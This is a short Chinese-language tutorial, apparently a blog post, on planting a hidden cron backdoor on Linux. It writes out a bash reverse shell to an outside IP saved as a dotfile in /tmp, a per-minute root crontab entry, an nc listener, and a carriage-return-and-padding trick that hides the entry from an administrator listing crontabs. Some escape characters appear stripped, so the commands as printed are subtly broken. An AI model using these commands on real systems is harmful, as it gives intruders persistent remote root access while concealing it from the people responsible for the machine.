什么是Cron?

‌‌‌　　在Linux系统中，计划任务一般是由cron承担，我们可以把cron设置为开机时自动启动。cron启动后，它会读取它的所有配置文件（全局性配置文件/etc/crontab，以及每个用户的计划任务配置文件），然后cron会根据命令和执行时间来按时来调用工作任务。‌‌‌

在这里学习计划任务

https://www.runoob.com/linux/linux-comm-crontab.html

http://cron.ciding.cc/

‌‌

部署Cron后门

‌‌‌　　我们可以利用这个计划任务功能进行反弹Shell。

‌‌‌  echo -e '#!/bin/bashnbash -i >& /dev/tcp/192.168.100.7/1234 0>&1' > /tmp/.niuma.sh
‌‌‌  chmod +x /tmp/.niuma.sh

添加定时任务

‌‌‌　　将要运行的脚本文件添加到计划任务里

‌‌‌  echo '*/1 * * * * root /tmp/.niuma.sh' | tee -a /etc/crontab
# */1 * * * * 表示每分钟都会运行一次该命令。

‌‌‌　　我们在攻击端使用nc -lvvp 1234 监听1234端口等待一分钟后的反弹shell

这样很明显管理员就看到了,我们可以简单的

隐藏计划任务

(crontab -l;printf "*/1 * * * * root /tmp/.niuma.sh;rno crontab for `whoami`%100cn")|crontab -

;r：这是一个分号和回车符，用于终止cron任务并另起一行。
%100c 用于插入 100 个空格字符。

我们使用隐藏后直接查看是看不到的。因为他被空格隐藏到最下面了